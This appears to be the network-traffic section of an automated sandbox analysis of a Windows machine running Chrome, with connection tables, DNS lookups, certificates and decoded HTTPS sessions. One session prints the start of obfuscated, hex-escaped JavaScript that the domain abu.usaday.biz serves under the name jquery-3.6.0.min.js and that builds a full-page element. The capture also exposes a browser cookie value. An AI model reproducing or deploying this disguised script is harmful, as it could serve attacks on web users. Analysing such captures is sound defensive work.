                      Oct 10, 2023 05:16:29.710366964 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710369110 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:29.710386992 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:29.710414886 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:29.710542917 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710624933 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:29.710635900 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710736036 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:29.710797071 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:30.203058004 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:30.203079939 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:30.203121901 CEST | 49721 | 443 | 192.168.2.3 | 40.68.123.157
                      Oct 10, 2023 05:16:30.203125954 CEST | 443 | 49721 | 40.68.123.157 | 192.168.2.3
                      Oct 10, 2023 05:16:57.994929075 CEST | 49707 | 443 | 192.168.2.3 | 23.65.35.190
                      Oct 10, 2023 05:16:57.994946957 CEST | 49708 | 80 | 192.168.2.3 | 23.64.190.239
                      Oct 10, 2023 05:16:58.158081055 CEST | 443 | 49707 | 23.65.35.190 | 192.168.2.3
                      Oct 10, 2023 05:16:58.158195972 CEST | 443 | 49707 | 23.65.35.190 | 192.168.2.3
                      Oct 10, 2023 05:16:58.158382893 CEST | 49707 | 443 | 192.168.2.3 | 23.65.35.190
                      Oct 10, 2023 05:16:58.158394098 CEST | 80 | 49708 | 23.64.190.239 | 192.168.2.3
                      Oct 10, 2023 05:16:58.158433914 CEST | 49707 | 443 | 192.168.2.3 | 23.65.35.190
                      Oct 10, 2023 05:16:58.158478975 CEST | 49708 | 80 | 192.168.2.3 | 23.64.190.239
                      Oct 10, 2023 05:17:07.248732090 CEST | 49722 | 443 | 192.168.2.3 | 40.127.169.103
                      Oct 10, 2023 05:17:07.248811960 CEST | 443 | 49722 | 40.127.169.103 | 192.168.2.3
                      Oct 10, 2023 05:17:07.248891115 CEST | 49722 | 443 | 192.168.2.3 | 40.127.169.103
                      Oct 10, 2023 05:17:07.249648094 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:07.249680042 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.177505970 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.177669048 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:08.182224035 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:08.182246923 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.182662964 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:08.184911013 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:08.226480007 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100327969 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100389004 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100429058 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100663900 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.100745916 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.100788116 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.101039886 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.104595900 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.104635954 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:09.104654074 CEST49722443192.168.2.340.127.169.103
                      Oct 10, 2023 05:17:09.104662895 CEST4434972240.127.169.103192.168.2.3
                      Oct 10, 2023 05:17:15.251873016 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.251940012 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.252029896 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.252701998 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.252722025 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.614530087 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.615031004 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.615113974 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.615447998 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.615901947 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:15.616012096 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:15.665930033 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:25.606395006 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:25.606472969 CEST44349727172.217.12.132192.168.2.3
                      Oct 10, 2023 05:17:25.606545925 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:27.042831898 CEST49727443192.168.2.3172.217.12.132
                      Oct 10, 2023 05:17:27.042880058 CEST44349727172.217.12.132192.168.2.3
                      TimestampSource PortDest PortSource IPDest IP
                      Oct 10, 2023 05:16:10.844350100 CEST5129253192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.844708920 CEST5074653192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.845242977 CEST6134553192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.845524073 CEST5615653192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:10.999979019 CEST53631661.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008119106 CEST53507461.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008163929 CEST53512921.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008177042 CEST53613451.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.008842945 CEST53561561.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:11.977457047 CEST53572091.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.307085991 CEST6120353192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.307429075 CEST5525753192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.476754904 CEST53612031.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.477375984 CEST53552571.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.482376099 CEST5898053192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.482548952 CEST5150353192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:12.651099920 CEST53515031.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:12.652868986 CEST53589801.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:14.176481962 CEST5245653192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:14.176950932 CEST6074853192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:14.340353012 CEST53524561.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:14.340567112 CEST53607481.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:15.101687908 CEST6054453192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:15.101965904 CEST5938553192.168.2.31.1.1.1
                      Oct 10, 2023 05:16:15.265678883 CEST53605441.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:15.266284943 CEST53593851.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:30.302982092 CEST53541281.1.1.1192.168.2.3
                      Oct 10, 2023 05:16:49.236227036 CEST53627691.1.1.1192.168.2.3
                      Oct 10, 2023 05:17:10.498723030 CEST53624811.1.1.1192.168.2.3
                      Oct 10, 2023 05:17:11.783973932 CEST138138192.168.2.3192.168.2.255
                      Oct 10, 2023 05:17:12.820024967 CEST53556051.1.1.1192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 10, 2023 05:16:10.844350100 CEST | 192.168.2.3 | 1.1.1.1 | 0x6964 | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:10.844708920 CEST | 192.168.2.3 | 1.1.1.1 | 0x749f | Standard query (0) | clients2.google.com | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:10.845242977 CEST | 192.168.2.3 | 1.1.1.1 | 0x5675 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:10.845524073 CEST | 192.168.2.3 | 1.1.1.1 | 0xef65 | Standard query (0) | accounts.google.com | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:12.307085991 CEST | 192.168.2.3 | 1.1.1.1 | 0xee51 | Standard query (0) | abu.usaday.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:12.307429075 CEST | 192.168.2.3 | 1.1.1.1 | 0x3642 | Standard query (0) | abu.usaday.biz | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:12.482376099 CEST | 192.168.2.3 | 1.1.1.1 | 0x8ee5 | Standard query (0) | abu.usaday.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:12.482548952 CEST | 192.168.2.3 | 1.1.1.1 | 0xc604 | Standard query (0) | abu.usaday.biz | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:14.176481962 CEST | 192.168.2.3 | 1.1.1.1 | 0xa803 | Standard query (0) | a.nel.cloudflare.com | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:14.176950932 CEST | 192.168.2.3 | 1.1.1.1 | 0x744b | Standard query (0) | a.nel.cloudflare.com | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:15.101687908 CEST | 192.168.2.3 | 1.1.1.1 | 0x1029 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:15.101965904 CEST | 192.168.2.3 | 1.1.1.1 | 0x274e | Standard query (0) | www.google.com | 65 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 10, 2023 05:16:04.087738991 CEST | 1.1.1.1 | 192.168.2.3 | 0x8649 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2023 05:16:04.087738991 CEST | 1.1.1.1 | 192.168.2.3 | 0x8649 | No error (0) | fp2e7a.wpc.phicdn.net | - | 192.229.211.108 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:11.008119106 CEST | 1.1.1.1 | 192.168.2.3 | 0x749f | No error (0) | clients2.google.com | clients.l.google.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2023 05:16:11.008163929 CEST | 1.1.1.1 | 192.168.2.3 | 0x6964 | No error (0) | clients2.google.com | clients.l.google.com | - | CNAME (Canonical name) | IN (0x0001) | false
Oct 10, 2023 05:16:11.008163929 CEST | 1.1.1.1 | 192.168.2.3 | 0x6964 | No error (0) | clients.l.google.com | - | 142.250.72.174 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:11.008177042 CEST | 1.1.1.1 | 192.168.2.3 | 0x5675 | No error (0) | accounts.google.com | - | 142.250.217.141 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:12.476754904 CEST | 1.1.1.1 | 192.168.2.3 | 0xee51 | No error (0) | abu.usaday.biz | - | 172.67.148.211 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:12.476754904 CEST | 1.1.1.1 | 192.168.2.3 | 0xee51 | No error (0) | abu.usaday.biz | - | 104.21.63.171 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:12.477375984 CEST | 1.1.1.1 | 192.168.2.3 | 0x3642 | No error (0) | abu.usaday.biz | - | - | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:12.651099920 CEST | 1.1.1.1 | 192.168.2.3 | 0xc604 | No error (0) | abu.usaday.biz | - | - | 65 | IN (0x0001) | false
Oct 10, 2023 05:16:12.652868986 CEST | 1.1.1.1 | 192.168.2.3 | 0x8ee5 | No error (0) | abu.usaday.biz | - | 172.67.148.211 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:12.652868986 CEST | 1.1.1.1 | 192.168.2.3 | 0x8ee5 | No error (0) | abu.usaday.biz | - | 104.21.63.171 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:14.340353012 CEST | 1.1.1.1 | 192.168.2.3 | 0xa803 | No error (0) | a.nel.cloudflare.com | - | 35.190.80.1 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:15.265678883 CEST | 1.1.1.1 | 192.168.2.3 | 0x1029 | No error (0) | www.google.com | - | 172.217.12.132 | A (IP address) | IN (0x0001) | false
Oct 10, 2023 05:16:15.266284943 CEST | 1.1.1.1 | 192.168.2.3 | 0x274e | No error (0) | www.google.com | - | - | 65 | IN (0x0001) | false
                      • clients2.google.com
                      • accounts.google.com
                      • abu.usaday.biz
                      • a.nel.cloudflare.com
                      • slscr.update.microsoft.com
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Oct 10, 2023 05:16:28.437222004 CEST | 104.98.116.138 | 443 | 192.168.2.3 | 49709 | CN=r.bing.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US | CN=Microsoft RSA TLS CA 01, O=Microsoft Corporation, C=US | Tue Nov 15 21:16:38 CET 2022 | Wed Nov 15 21:16:38 CET 2023 | 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-16-23-65281,29-23-24,0 | 28a2c9bd18a11de089ef85a160da29e4
(issuer certificate, same session) | - | - | - | - | CN=Microsoft RSA TLS CA 01, O=Microsoft Corporation, C=US | CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE | Wed Jul 22 01:00:00 CEST 2020 | Tue Oct 08 09:00:00 CEST 2024 | - | -
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49713 | 142.250.72.174 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:11 UTC | 0 | OUT | GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=117.0.5938.134&lang=en-US&acceptformat=crx3,puff&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26brand%3DONGR%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1
                      Host: clients2.google.com
                      Connection: keep-alive
                      X-Goog-Update-Interactivity: fg
                      X-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda
                      X-Goog-Update-Updater: chromecrx-117.0.5938.134
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49714 | 142.250.217.141 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:11 UTC | 0 | OUT | POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                      Host: accounts.google.com
                      Connection: keep-alive
                      Content-Length: 1
                      Origin: https://www.google.com
                      Content-Type: application/x-www-form-urlencoded
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: no-cors
                      Sec-Fetch-Dest: empty
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
                      Cookie: 1P_JAR=2023-10-05-14; NID=511=OL3WgnA24QwPfMpspsItpZ2c_g7YXAAMilzUqiZdxG8z8Ka1c00AfG24ctRwvhPMrHVqO7oNbKVSwiOA0g2EzuMjPJIvQtOS7zZy99O8OkMoKSMKDFs-L1TjxHc_KVN5KBVb4BTfsPAzvlWsn_iACmkP3ulD50w_qpZ6JVqkr7w
2023-10-10 03:16:11 UTC | 1 | OUT | Data Raw: 20
                      Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.3 | 49719 | 35.190.80.1 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:15 UTC | 11 | OUT | POST /report/v3?s=u9mxTix3ZJeEJl1m3ga2mkiabeNsZGF4WOpN8lPQs64Iu3E%2BSd%2BCKY9%2FChjT5hZ8PNITU8eUe2meCLRVub3mm%2BWJxmVUkgsGuKltOtOpbj9tUQdvM2x4uKtaOCrzYJRXwg%3D%3D HTTP/1.1
                      Host: a.nel.cloudflare.com
                      Connection: keep-alive
                      Content-Length: 438
                      Content-Type: application/reports+json
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9
2023-10-10 03:16:15 UTC | 11 | OUT | Data Ascii: [{"age":0,"body":{"elapsed_time":717,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://abu.usaday.biz/jquery-3.6.0.min.js","sampling_fraction":1.0,"server_ip":"172.67.148.211","status_code":404,"type":"http.error"},"type":"net


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 35.190.80.1 | 443 | 192.168.2.3 | 49719 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:15 UTC | 12 | IN | HTTP/1.1 200 OK
                      Content-Length: 0
                      date: Tue, 10 Oct 2023 03:16:15 GMT
                      Via: 1.1 google
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.3 | 49721 | 40.68.123.157 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:29 UTC | 12 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
2023-10-10 03:16:29 UTC | 12 | IN | HTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                      MS-CorrelationId: 81ff7709-d024-48c3-ac3e-d6455c2f19e5
                      MS-RequestId: b2184d49-70eb-4037-823e-7df8de3d9039
                      MS-CV: IOEbIvuiQUafp23L.0
                      X-Microsoft-SLSClientCache: 2880
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 10 Oct 2023 03:16:29 GMT
                      Connection: close
                      Content-Length: 24490


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.3 | 49722 | 40.127.169.103 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:17:08 UTC | 36 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.3448/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.3031&MK=kT2HDdY9UAm6etl&MD=MFs5p6DS HTTP/1.1
                      Connection: Keep-Alive
                      Accept: */*
                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                      Host: slscr.update.microsoft.com
2023-10-10 03:17:09 UTC | 37 | IN | HTTP/1.1 200 OK
                      Cache-Control: no-cache
                      Pragma: no-cache
                      Content-Type: application/octet-stream
                      Expires: -1
                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                      ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                      MS-CorrelationId: a470e3d8-bdd4-41bf-aa05-642e6f96ac84
                      MS-RequestId: 9a27cbfa-5825-450a-804a-1fc8ae2b2f40
                      MS-CV: UvP0cYP2KU69dT3U.0
                      X-Microsoft-SLSClientCache: 2160
                      Content-Disposition: attachment; filename=environment.cab
                      X-Content-Type-Options: nosniff
                      Date: Tue, 10 Oct 2023 03:17:08 GMT
                      Connection: close
                      Content-Length: 25457


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 142.250.72.174 | 443 | 192.168.2.3 | 49713 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:11 UTC | 1 | IN | HTTP/1.1 200 OK
                      Content-Security-Policy: script-src 'report-sample' 'nonce-FbHdtP7m_qw_z45hWPGXCA' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 10 Oct 2023 03:16:11 GMT
                      Content-Type: text/xml; charset=UTF-8
                      X-Daynum: 6125
                      X-Daystart: 72971
                      X-Content-Type-Options: nosniff
                      X-Frame-Options: SAMEORIGIN
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
2023-10-10 03:16:11 UTC | 2 | IN | Data Ascii: 2c9<?xml version="1.0" encoding="UTF-8"?><gupdate xmlns="http://www.google.com/update2/response" protocol="2.0" server="prod"><daystart elapsed_days="6125" elapsed_seconds="72971"/><app appid="nmmhkkegccagdldgiimedpiccmgmieda" cohort="1::" cohortname=""
2023-10-10 03:16:11 UTC | 2 | IN | Data Ascii: 723f56b8717175c536685c5450122b30789464ad82" hash_sha256="81e3a4d43a73699e1b7781723f56b8717175c536685c5450122b30789464ad82" protected="0" size="248531" status="ok" version="1.0.0.6"/></app></gupdate>
2023-10-10 03:16:11 UTC | 2 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 142.250.217.141 | 443 | 192.168.2.3 | 49714 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | kBytes transferred | Direction | Data
2023-10-10 03:16:11 UTC | 2 | IN | HTTP/1.1 200 OK
                      Content-Type: application/json; charset=utf-8
                      Access-Control-Allow-Origin: https://www.google.com
                      Access-Control-Allow-Credentials: true
                      X-Content-Type-Options: nosniff
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Tue, 10 Oct 2023 03:16:11 GMT
                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                      Cross-Origin-Opener-Policy: same-origin
                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport
                      Content-Security-Policy: script-src 'report-sample' 'nonce-5811Pc6XbKz9m6VRvcfBcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self'
                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist
                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                      Server: ESF
                      X-XSS-Protection: 0
                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Connection: close
                      Transfer-Encoding: chunked
2023-10-10 03:16:11 UTC | 4 | IN | Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a
                      Data Ascii: 11["gaia.l.a.r",[]]
2023-10-10 03:16:11 UTC | 4 | IN | Data Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session ID: 4, Source IP: 192.168.2.3, Source Port: 49715, Destination IP: 172.67.148.211, Destination Port: 443, Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp: 2023-10-10 03:16:13 UTC, kBytes transferred: 4, Direction: OUT
                      GET /jquery-3.6.0.min.js HTTP/1.1
                      Host: abu.usaday.biz
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: none
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-User: ?1
                      Sec-Fetch-Dest: document
                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en;q=0.9


                      Session ID: 5, Source IP: 172.67.148.211, Source Port: 443, Destination IP: 192.168.2.3, Destination Port: 49715, Process: C:\Program Files\Google\Chrome\Application\chrome.exe
                      Timestamp: 2023-10-10 03:16:13 UTC, kBytes transferred: 5, Direction: IN
                      HTTP/1.1 200 OK
                      Date: Tue, 10 Oct 2023 03:16:13 GMT
                      Content-Type: application/javascript
                      Content-Length: 2790
                      Connection: close
                      Last-Modified: Tue, 01 Jun 2021 06:00:40 GMT
                      ETag: "60b5cd08-ae6"
                      Expires: Tue, 10 Oct 2023 08:01:04 GMT
                      Cache-Control: max-age=43200
                      CF-Cache-Status: HIT
                      Age: 26109
                      Accept-Ranges: bytes
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v%2BlhAe5eiQ63xT6kO7D5MYFK%2BClGD%2BBmVQb3SqBYmMUQp%2F1Nro%2BDO0LNcn0fzYjClvEWCoJyz3QV2hQRFPUhjCHRnZS9Iv10CdCobcDG7ymZP%2FyfSkI5RbOvRz06mOEQ1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 813bb40efeb2dbc2-LAX
                      alt-svc: h3=":443"; ma=86400
                      Timestamp: 2023-10-10 03:16:13 UTC, kBytes transferred: 5, Direction: IN
                      Data Ascii: var _0x5c71=["\x63\x38\x32\x32\x63\x31\x62\x36\x33\x38\x35\x33\x65\x64\x32\x37\x33\x62\x38\x39\x36\x38\x37\x61\x63\x35\x30\x35\x66\x39\x66\x61","\x37\x33\x38\x61\x61\x38\x64\x33\x62\x63\x30\x32\x65\x62\x38\x37\x31\x32\x61\x63\x64\x30\x65\x62\x32\x63\x66\x
                      Timestamp: 2023-10-10 03:16:13 UTC, kBytes transferred: 6, Direction: IN
                      Data Ascii: ","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x63\x73\x73\x54\x65\x78\x74","\x73\x74\x79\x6C\x65","\x77\x69\x64\x74\x68\x3A\x31\x30\x30\x25\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x31\x30\x30\x25\x3B\x20\x70\x6F\x73\x69\x74\x69\x6F\x6E
                      Timestamp: 2023-10-10 03:16:13 UTC, kBytes transferred: 7, Direction: IN
